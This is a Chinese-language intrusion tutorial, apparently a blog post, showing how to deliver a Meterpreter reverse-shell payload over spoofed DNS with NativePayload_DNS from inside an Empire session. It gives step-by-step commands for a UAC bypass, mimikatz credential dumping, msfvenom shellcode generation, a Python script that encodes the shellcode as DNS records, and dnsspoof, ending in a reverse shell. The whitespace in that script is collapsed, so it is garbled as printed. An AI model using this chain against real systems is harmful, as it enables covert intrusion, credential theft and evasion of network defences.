正好结合这个说一个dns传输backdoor payload的方式
- NativePayload_DNS项目地址:https://github.com/DamonMohammadbagher/NativePayload_DNS.git首先编译源码生成可执行文件使用visual studio 工具命令编译!
文章插图
生成NativePayload_DNS.exe。
上传到我们攻击的机器上去,进入到交互界面 。
首先我们先试试利用bypassuac这个功能,看看是否可以提升权限获取该机器管理员的密码,直接运行mimikatz是会报错的 。
文章插图
运行后我们看到有第二个会话开始建立中,稍等片刻
(Empire: win7pro) > agents #列举代理会话
文章插图
细心的人可能发现多了一个*号那个usename那里
(Empire: agents) > rename 8TKB4G9S win7proprivilege #这里我说了三遍,很重要 。
(Empire: agents) > interact win7proprivilege #和这个会话交互
文章插图
(Empire: win7proprivilege) > mimikatz #使用mimikatz
文章插图
(Empire: win7proprivilege) > upload /root/Desktop/NativePayload_DNS.exe #上传
(Empire: win7proprivilege) > shell dir #查看是否上传成功.
文章插图
开始配置服务端
msfvenom--platformwindows--archx64-pwindows/x64/meterpreter/reverse_tcplhost=192.168.80.131lport=4444-fc>/root/Desktop/payload.txt
#生成shellcode文章插图
这里申明下,网上的命令可能因为文章格式问题,导致命令不对,这里我做了修正 。写了一个转换脚本,代码如下(一把梭,勿喷):
#!/usr/bin/Python2#!-*-coding:utf-8-*-a=''f=open("payload.txt","rb")line=f.readlines()[1:]f.close()forlinesinrange(len(line)):ipls='1.1.1.%s'%linesshellcode=line[lines].replace(";","").strip().rstrip(""")+".1.com"+"""text=ipls+""+"""+"0x"+shellcode.lstrip(""")a+=text.replace("","0")+"n"fn=open("dns.txt","wb")fn.write(a)fn.close()
这里网上给出的样例也有问题,看了好久发现传输的payload缺少了一个"0x",于是在dns.txt做了修改 。一直被老哥教育细心,耐心,这回总算用成了一回 。开启msf监听,这里就不再赘述了 。
文章插图
开启欺骗
root@localhost# dnsspoof -f dns.txt
文章插图
服务端配置完成,现在回到我们的empire会话执行命令,获取meterpreter shell.
(Empire: win7proprivilege) > shell NativePayload_DNS.exe 1.1.1. 34 192.168.80.131 #执行
文章插图
这个比较慢,需要稍等会,等它传输完,就会返回shell 。
一张图证明empire绕过了UAC:
文章插图
推荐阅读
- 内网域实战渗透常用命令总结
- 两种网络地址段,如何设置内网和外网一起上?
- 利用ssh将内网端口反向连接穿透到外网vps
- 5分钟实现内网穿透
- 双杠杠臂屈伸的方法
- 办公室上网攻略--内网、外网、路由,自主控制
- ngrok服务器搭建 一分钟实现内网穿透
- 内网域实战渗透常用命令
- Ngrok:超简单的内网穿透,了解一下?
- Windows内网协议学习Kerberos篇之PAC